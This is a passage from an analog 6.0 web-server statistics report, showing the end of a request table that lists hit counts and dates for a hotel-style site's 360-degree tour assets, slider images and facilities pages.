<tr><td class="R">80</td><td class="b">&nbsp;</td><td class="D">May/30/19  1:43 PM</td><td class="xl">/assets/owl-carousel/grabbing.png</td></tr>
<tr><td class="R">67</td><td class="b"> 0.01%</td><td class="D">May/30/19  9:28 PM</td><td class="xl">/assets/360/lobby/Output0.xml</td></tr>
<tr><td class="R">66</td><td class="b"> 0.01%</td><td class="D">May/30/19  9:28 PM</td><td class="xl">/assets/360/lobby/Output.xml</td></tr>
<tr><td class="R">51</td><td class="b"> 0.01%</td><td class="D">May/30/19  9:28 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu0.png</td></tr>
<tr><td class="R">51</td><td class="b"> 0.01%</td><td class="D">May/30/19  9:28 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu2.png</td></tr>
<tr><td class="R">50</td><td class="b"> 0.01%</td><td class="D">May/30/19  9:28 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu5.png</td></tr>
<tr><td class="R">49</td><td class="b"> 0.01%</td><td class="D">May/30/19  9:28 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu1.png</td></tr>
<tr><td class="R">49</td><td class="b"> 0.12%</td><td class="D">May/30/19  9:28 PM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/preview.jpg</td></tr>
<tr><td class="R">48</td><td class="b"> 0.01%</td><td class="D">May/30/19  9:28 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu3.png</td></tr>
<tr><td class="R">47</td><td class="b"> 0.01%</td><td class="D">May/25/19  4:02 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu4.png</td></tr>
<tr><td class="R">47</td><td class="b"> 0.01%</td><td class="D">May/30/19  9:28 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu6.png</td></tr>
<tr><td class="R">47</td><td class="b"> 0.01%</td><td class="D">May/25/19  4:02 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu8.png</td></tr>
<tr><td class="R">47</td><td class="b"> 0.17%</td><td class="D">May/31/19  5:12 AM</td><td class="xl">/assets/images/sliders/facili/rest/inner/7.jpg</td></tr>
<tr><td class="R">46</td><td class="b"> 0.01%</td><td class="D">May/30/19  9:28 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/menu/menu7.png</td></tr>
<tr><td class="R">43</td><td class="b"> 0.04%</td><td class="D">May/24/19  2:06 AM</td><td class="xl">/facilities/bar</td></tr>
<tr><td class="R">41</td><td class="b"> 0.17%</td><td class="D">May/25/19  4:02 PM</td><td class="xl">/assets/360/lobby/Output.swf</td></tr>
<tr><td class="R">40</td><td class="b"> 0.47%</td><td class="D">May/25/19  1:20 PM</td><td class="xl">/assets/images/sliders/facili/room/inner/2.jpg</td></tr>
<tr><td class="R">39</td><td class="b"> 0.16%</td><td class="D">May/27/19  3:22 PM</td><td class="xl">/assets/360/reinhart_room/build.swf</td></tr>
<tr><td class="R">37</td><td class="b"> 0.12%</td><td class="D">May/28/19  3:58 PM</td><td class="xl">/assets/images/sliders/facili/rest/inner/1.jpg</td></tr>
<tr><td class="R">36</td><td class="b"> 0.12%</td><td class="D">May/30/19  9:28 PM</td><td class="xl">/assets/360/lobby/krpanoiphone.js</td></tr>
<tr><td class="R">35</td><td class="b">&nbsp;</td><td class="D">May/30/19  9:28 PM</td><td class="xl">/assets/360/lobby/krpanoiphone.license.js</td></tr>
<tr><td class="R">35</td><td class="b"> 0.03%</td><td class="D">May/18/19  9:38 AM</td><td class="xl">/facilities/about-us</td></tr>
<tr><td class="R">34</td><td class="b"> 0.46%</td><td class="D">May/27/19 12:24 AM</td><td class="xl">/assets/images/sliders/facili/room/inner/1.jpg</td></tr>
<tr><td class="R">30</td><td class="b"> 0.03%</td><td class="D">May/18/19  9:40 AM</td><td class="xl">/facilities/privacy-policy</td></tr>
<tr><td class="R">29</td><td class="b"> 0.03%</td><td class="D">May/18/19  9:40 AM</td><td class="xl">/facilities/terms-and-conditions</td></tr>
<tr><td class="R">28</td><td class="b"> 0.05%</td><td class="D">May/30/19  1:02 AM</td><td class="xl">/assets/images/sliders/facili/bar/inner/4.jpg</td></tr>
<tr><td class="R">27</td><td class="b"> 0.24%</td><td class="D">May/26/19 10:25 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/mobile/1/tablet_face.jpg</td></tr>
<tr><td class="R">27</td><td class="b"> 0.18%</td><td class="D">May/26/19 10:25 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/mobile/4/tablet_face.jpg</td></tr>
<tr><td class="R">27</td><td class="b"> 0.06%</td><td class="D">Apr/ 1/19  8:40 AM</td><td class="xl">/assets/images/sliders/facili/bar/inner/1.jpg</td></tr>
<tr><td class="R">27</td><td class="b"> 0.22%</td><td class="D">May/26/19 10:25 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/mobile/5/tablet_face.jpg</td></tr>
<tr><td class="R">26</td><td class="b"> 0.21%</td><td class="D">May/26/19 10:25 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/mobile/2/tablet_face.jpg</td></tr>
<tr><td class="R">26</td><td class="b"> 0.29%</td><td class="D">May/26/19 10:25 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/mobile/3/tablet_face.jpg</td></tr>
<tr><td class="R">26</td><td class="b"> 0.23%</td><td class="D">May/26/19 10:25 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/mobile/0/tablet_face.jpg</td></tr>
<tr><td class="R">24</td><td class="b"> 0.05%</td><td class="D">May/18/19  8:30 PM</td><td class="xl">/assets/images/sliders/facili/bar/inner/3.jpg</td></tr>
<tr><td class="R">23</td><td class="b"> 0.02%</td><td class="D">May/18/19  9:40 AM</td><td class="xl">/facilities/facilities</td></tr>
<tr><td class="R">23</td><td class="b"> 0.28%</td><td class="D">May/27/19 12:25 AM</td><td class="xl">/assets/images/sliders/facili/room/inner/3.jpg</td></tr>
<tr><td class="R">22</td><td class="b"> 0.09%</td><td class="D">May/31/19  5:37 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/1/1_4.jpg</td></tr>
<tr><td class="R">22</td><td class="b"> 0.12%</td><td class="D">May/31/19  5:37 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/0/0_0.jpg</td></tr>
<tr><td class="R">22</td><td class="b"> 0.06%</td><td class="D">May/31/19  5:37 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/0/0_2.jpg</td></tr>
<tr><td class="R">22</td><td class="b"> 0.10%</td><td class="D">May/31/19  5:37 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/1/0_2.jpg</td></tr>
<tr><td class="R">22</td><td class="b"> 0.10%</td><td class="D">May/31/19  5:37 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/1/1_1.jpg</td></tr>
<tr><td class="R">22</td><td class="b"> 0.02%</td><td class="D">May/31/19  5:37 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/1/1_5.jpg</td></tr>
<tr><td class="R">22</td><td class="b"> 0.13%</td><td class="D">May/25/19  4:02 PM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/1/0_1.jpg</td></tr>
<tr><td class="R">22</td><td class="b"> 0.10%</td><td class="D">May/31/19  5:37 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/1/1_0.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.09%</td><td class="D">May/31/19  5:37 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/1/1_2.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.05%</td><td class="D">May/16/19 11:44 AM</td><td class="xl">/assets/images/sliders/facili/bar/inner/2.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.10%</td><td class="D">May/25/19  4:02 PM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/1/0_0.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.09%</td><td class="D">May/25/19  4:02 PM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/1/0_4.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.09%</td><td class="D">May/31/19  5:37 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/1/1_3.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.02%</td><td class="D">May/18/19  9:40 AM</td><td class="xl">/facilities/promotions</td></tr>
<tr><td class="R">21</td><td class="b"> 0.10%</td><td class="D">May/31/19  5:37 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/0/0_1.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.09%</td><td class="D">May/25/19  4:03 PM</td><td class="xl">/assets/360/stephan_suite/build.swf</td></tr>
<tr><td class="R">21</td><td class="b"> 0.09%</td><td class="D">May/31/19  5:37 AM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/1/0_3.jpg</td></tr>
<tr><td class="R">21</td><td class="b"> 0.01%</td><td class="D">May/25/19  4:02 PM</td><td class="xl">/assets/360/lobby/Outputdata/Output0/1/0_5.jpg</td></tr>
<tr><td class="R">20</td><td class="b"> 0.01%</td><td class="D">May/ 9/19 10:48 PM</td><td class="xl">/assets/360/lobby/Outputdata/graphics/flares.jpg</td></tr>
<tr><td class="R">2684</td><td class="b"> 7.14%</td><td class="D">May/31/19 12:47 PM</td><td class="xl">[not listed: 346 files]</td></tr>
</tbody></table>
</div><div class="footer"><p class="credit">This analysis was produced by <a href="http://www.analog.cx/">analog 6.0</a>.
<br /><span class="runtimetitle">Running time:</span> Less than 1 second.
</p>
<p class="goto">(<span class="gototitle">Go To</span>: <a href="#Top">Top</a> | <a href="#gensum">General Summary</a> | <a href="#month">Monthly Report</a> | <a href="#daysum">Daily Summary</a> | <a href="#hoursum">Hourly Summary</a> | <a href="#dom">Domain Report</a> | <a href="#org">Organization Report</a> | <a href="#redirref">Redirected Referrer Report</a> | <a href="#refsite">Referring Site Report</a> | <a href="#searchw">Search Word Report</a> | <a href="#browrep">Browser Report</a> | <a href="#browsum">Browser Summary</a> | <a href="#os">Operating System Report</a> | <a href="#code">Status Code Report</a> | <a href="#size">File Size Report</a> | <a href="#type">File Type Report</a> | <a href="#dir">Directory Report</a> | <a href="#req">Request Report</a>)</p>
</div>
</body>
</html>
